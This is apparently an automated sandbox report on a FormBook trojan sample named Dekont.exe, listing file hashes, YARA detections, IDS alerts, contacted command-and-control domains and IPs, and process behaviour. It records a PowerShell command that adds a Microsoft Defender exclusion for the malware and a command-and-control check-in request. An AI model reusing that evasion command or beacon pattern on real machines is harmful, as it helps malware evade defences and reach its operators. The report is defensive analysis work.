                                http://www.eals.lat/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.y-language-menu.netexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.oko.events/bc01/www.hildrens-clothing.todayexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.26.122.70
                                		www.oko.eventsRussian Federation
                                		62082HOSTLANDRUtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1517901
                                Start date and time:2024-09-25 08:56:09 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 11m 18s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:12
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Sample name:Dekont.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@12/6@11/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 103
                                • Number of non-executed functions: 310
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtEnumerateKey calls found.
                                • Report size getting too big, too many NtOpenKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: Dekont.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                02:57:02API Interceptor1x Sleep call for process: Dekont.exe modified
                                02:57:04API Interceptor13x Sleep call for process: powershell.exe modified
                                02:57:12API Interceptor8293949x Sleep call for process: explorer.exe modified
                                02:57:47API Interceptor7285294x Sleep call for process: control.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                www.oko.eventsQuotation #10091.exeGet hashmaliciousFormBookBrowse
                                • 185.26.122.70
                                PAGO_200924.exeGet hashmaliciousFormBookBrowse
                                • 185.26.122.70

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                HOSTLANDRUWave.exeGet hashmaliciousDiscord Token Stealer, Orcus, SugarDumpBrowse
                                • 185.37.62.158
                                DFpUKTL6kg.exeGet hashmaliciousDCRatBrowse
                                • 185.26.122.81
                                http://mydpd.space/Get hashmaliciousDCRat, PureLog StealerBrowse
                                • 185.26.122.30
                                HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeGet hashmaliciousDCRatBrowse
                                • 185.26.122.79
                                yk2Eh24FDd.exeGet hashmaliciousUnknownBrowse
                                • 185.26.122.81
                                hT0xyYJthf.exeGet hashmaliciousUnknownBrowse
                                • 185.26.122.81
                                https://hideuri.com/EXWJgmGet hashmaliciousUnknownBrowse
                                • 185.26.122.79
                                rwDENO48jg.elfGet hashmaliciousMirai, MoobotBrowse
                                • 185.221.215.184
                                i21878JK11.exeGet hashmaliciousDCRatBrowse
                                • 185.26.122.80
                                i21878JK11.exeGet hashmaliciousDCRatBrowse
                                • 185.26.122.80

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dekont.exe.log

                                Download File
                                Process:C:\Users\user\Desktop\Dekont.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2232
                                Entropy (8bit):5.380805901110357
                                Encrypted:false
                                SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZM0Uis:lGLHxvCsIfA2KRHmOugrOs
                                MD5:C748439F41CEA9024CA9F3BCFA7AF9F4
                                SHA1:C3D78DB461713EEFADF38AC6EC5E280FB7DD5A6B
                                SHA-256:631883A48CA5262BCAB48E8D17A64B76AB76025FFAA398F4C4A03FC000619DB3
                                SHA-512:E7FC99DA112597A089468E6BD384720226DC39C6851B4FFBBE3E4881508EABAA554D021EB41527D34E25D84433ADDE82BE1F0DF9D7A8D8DED977D4CF4931CFAD
                                Malicious:false
                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vrbvq4u.v0w.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ibbq4li.xil.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bk4yzx4z.ilz.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1gbsrgm.410.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.806060646936104
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:Dekont.exe
                                File size:604'672 bytes
                                MD5:da966801158ea63939a23e310275241a
                                SHA1:ef1f98cd080aca6cbf0b1ea8b08e7ab492435ae8
                                SHA256:883b2afba671ff4851527b315260a4415a111c013811fec1822dcae4076628e5
                                SHA512:0942fbf2efc18d7feff67c24c9d36528ab63937daa3d84c0f34f22d1466d184f38af24a5d264d908b252b6c3c3463f3b33e241aa72ba3e9bec43c55037c58bfd
                                SSDEEP:12288:Uh8bQbrxKlcjdOliPwsSpRYAKrgCqZKVvsABefO5fw:U+I9kiPqR/04KCABem
                                TLSH:88D402852255CB1AD4A64BB40563D2FC27B55ECDB812C34B5FCABEEF7C7AB000A40766
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....v...............0..............M... ...`....@.. ....................................@................................

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x494dfa
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x8F76A18B [Mon Apr 9 19:54:51 2046 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x94da70x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x960000x620.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x980000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x93ba40x70.text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x92e000x92e0082361f55a1c27d15b9b8e8deb3ca0539False0.9234807180851063data7.817099894790621IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0x960000x6200x8005affcf1ae180c5987efbe56a1776b2bcFalse0.3349609375data3.452543589960233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x980000xc0x20046d3957350b9e9f39b8baeb5b3fb2933False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_VERSION0x960900x390data0.4243421052631579
                                RT_MANIFEST0x964300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-09-25T09:00:23.908530+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549715185.26.122.7080TCP
                                2024-09-25T09:00:23.908530+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549715185.26.122.7080TCP
                                2024-09-25T09:00:23.908530+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549715185.26.122.7080TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Sep 25, 2024 09:00:23.393095970 CEST4971580192.168.2.5185.26.122.70
                                Sep 25, 2024 09:00:23.397943974 CEST8049715185.26.122.70192.168.2.5
                                Sep 25, 2024 09:00:23.398010969 CEST4971580192.168.2.5185.26.122.70
                                Sep 25, 2024 09:00:23.398080111 CEST4971580192.168.2.5185.26.122.70
                                Sep 25, 2024 09:00:23.402847052 CEST8049715185.26.122.70192.168.2.5
                                Sep 25, 2024 09:00:23.901675940 CEST4971580192.168.2.5185.26.122.70
                                Sep 25, 2024 09:00:23.906877041 CEST8049715185.26.122.70192.168.2.5
                                Sep 25, 2024 09:00:23.908529997 CEST4971580192.168.2.5185.26.122.70

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Sep 25, 2024 08:57:40.481304884 CEST5262653192.168.2.51.1.1.1
                                Sep 25, 2024 08:57:40.497243881 CEST53526261.1.1.1192.168.2.5
                                Sep 25, 2024 08:58:00.261334896 CEST5563253192.168.2.51.1.1.1
                                Sep 25, 2024 08:58:00.286113977 CEST53556321.1.1.1192.168.2.5
                                Sep 25, 2024 08:58:20.527314901 CEST5594453192.168.2.51.1.1.1
                                Sep 25, 2024 08:58:20.536608934 CEST53559441.1.1.1192.168.2.5
                                Sep 25, 2024 08:59:01.404853106 CEST6543953192.168.2.51.1.1.1
                                Sep 25, 2024 08:59:01.419966936 CEST53654391.1.1.1192.168.2.5
                                Sep 25, 2024 08:59:21.857069969 CEST5007253192.168.2.51.1.1.1
                                Sep 25, 2024 08:59:21.892051935 CEST53500721.1.1.1192.168.2.5
                                Sep 25, 2024 08:59:42.296004057 CEST6529253192.168.2.51.1.1.1
                                Sep 25, 2024 08:59:42.327967882 CEST53652921.1.1.1192.168.2.5
                                Sep 25, 2024 09:00:02.792985916 CEST5608353192.168.2.51.1.1.1
                                Sep 25, 2024 09:00:02.801386118 CEST53560831.1.1.1192.168.2.5
                                Sep 25, 2024 09:00:23.256860971 CEST5950753192.168.2.51.1.1.1
                                Sep 25, 2024 09:00:23.391716957 CEST53595071.1.1.1192.168.2.5
                                Sep 25, 2024 09:00:43.656501055 CEST5318553192.168.2.51.1.1.1
                                Sep 25, 2024 09:00:43.825239897 CEST53531851.1.1.1192.168.2.5
                                Sep 25, 2024 09:01:04.128222942 CEST5414253192.168.2.51.1.1.1
                                Sep 25, 2024 09:01:04.138254881 CEST53541421.1.1.1192.168.2.5
                                Sep 25, 2024 09:01:25.964833975 CEST5173953192.168.2.51.1.1.1
                                Sep 25, 2024 09:01:25.973809004 CEST53517391.1.1.1192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Sep 25, 2024 08:57:40.481304884 CEST192.168.2.51.1.1.10x73c9Standard query (0)www.ar-accident-lawyer-389.todayA (IP address)IN (0x0001)false
                                Sep 25, 2024 08:58:00.261334896 CEST192.168.2.51.1.1.10xa67cStandard query (0)www.nnevateknoloji.xyzA (IP address)IN (0x0001)false
                                Sep 25, 2024 08:58:20.527314901 CEST192.168.2.51.1.1.10x8eeStandard query (0)www.eddogbrands.websiteA (IP address)IN (0x0001)false
                                Sep 25, 2024 08:59:01.404853106 CEST192.168.2.51.1.1.10x4d85Standard query (0)www.inancialenlightment.infoA (IP address)IN (0x0001)false
                                Sep 25, 2024 08:59:21.857069969 CEST192.168.2.51.1.1.10xc0ecStandard query (0)www.omotech-dz.netA (IP address)IN (0x0001)false
                                Sep 25, 2024 08:59:42.296004057 CEST192.168.2.51.1.1.10xd181Standard query (0)www.y-language-menu.netA (IP address)IN (0x0001)false
                                Sep 25, 2024 09:00:02.792985916 CEST192.168.2.51.1.1.10x50cStandard query (0)www.ebshieldsrenew.liveA (IP address)IN (0x0001)false
                                Sep 25, 2024 09:00:23.256860971 CEST192.168.2.51.1.1.10xd0a7Standard query (0)www.oko.eventsA (IP address)IN (0x0001)false
                                Sep 25, 2024 09:00:43.656501055 CEST192.168.2.51.1.1.10xfa71Standard query (0)www.hildrens-clothing.todayA (IP address)IN (0x0001)false
                                Sep 25, 2024 09:01:04.128222942 CEST192.168.2.51.1.1.10x4f17Standard query (0)www.olocaustaffirmer.netA (IP address)IN (0x0001)false
                                Sep 25, 2024 09:01:25.964833975 CEST192.168.2.51.1.1.10x9270Standard query (0)www.eals.latA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Sep 25, 2024 08:57:40.497243881 CEST1.1.1.1192.168.2.50x73c9Name error (3)www.ar-accident-lawyer-389.todaynonenoneA (IP address)IN (0x0001)false
                                Sep 25, 2024 08:58:00.286113977 CEST1.1.1.1192.168.2.50xa67cName error (3)www.nnevateknoloji.xyznonenoneA (IP address)IN (0x0001)false
                                Sep 25, 2024 08:58:20.536608934 CEST1.1.1.1192.168.2.50x8eeName error (3)www.eddogbrands.websitenonenoneA (IP address)IN (0x0001)false
                                Sep 25, 2024 08:59:01.419966936 CEST1.1.1.1192.168.2.50x4d85Name error (3)www.inancialenlightment.infononenoneA (IP address)IN (0x0001)false
                                Sep 25, 2024 08:59:21.892051935 CEST1.1.1.1192.168.2.50xc0ecName error (3)www.omotech-dz.netnonenoneA (IP address)IN (0x0001)false
                                Sep 25, 2024 08:59:42.327967882 CEST1.1.1.1192.168.2.50xd181Name error (3)www.y-language-menu.netnonenoneA (IP address)IN (0x0001)false
                                Sep 25, 2024 09:00:02.801386118 CEST1.1.1.1192.168.2.50x50cName error (3)www.ebshieldsrenew.livenonenoneA (IP address)IN (0x0001)false
                                Sep 25, 2024 09:00:23.391716957 CEST1.1.1.1192.168.2.50xd0a7No error (0)www.oko.events185.26.122.70A (IP address)IN (0x0001)false
                                Sep 25, 2024 09:00:43.825239897 CEST1.1.1.1192.168.2.50xfa71Name error (3)www.hildrens-clothing.todaynonenoneA (IP address)IN (0x0001)false
                                Sep 25, 2024 09:01:04.138254881 CEST1.1.1.1192.168.2.50x4f17Name error (3)www.olocaustaffirmer.netnonenoneA (IP address)IN (0x0001)false
                                Sep 25, 2024 09:01:25.973809004 CEST1.1.1.1192.168.2.50x9270Name error (3)www.eals.latnonenoneA (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • www.oko.events

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549715185.26.122.70801028C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                Sep 25, 2024 09:00:23.398080111 CEST168OUTGET /bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0 HTTP/1.1
                                Host: www.oko.events
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:02:57:01
                                Start date:25/09/2024
                                Path:C:\Users\user\Desktop\Dekont.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Dekont.exe"
                                Imagebase:0x4a0000
                                File size:604'672 bytes
                                MD5 hash:DA966801158EA63939A23E310275241A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:3
                                Start time:02:57:02
                                Start date:25/09/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe"
                                Imagebase:0x430000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:02:57:02
                                Start date:25/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:02:57:02
                                Start date:25/09/2024
                                Path:C:\Users\user\Desktop\Dekont.exe
                                Wow64 process (32bit):true
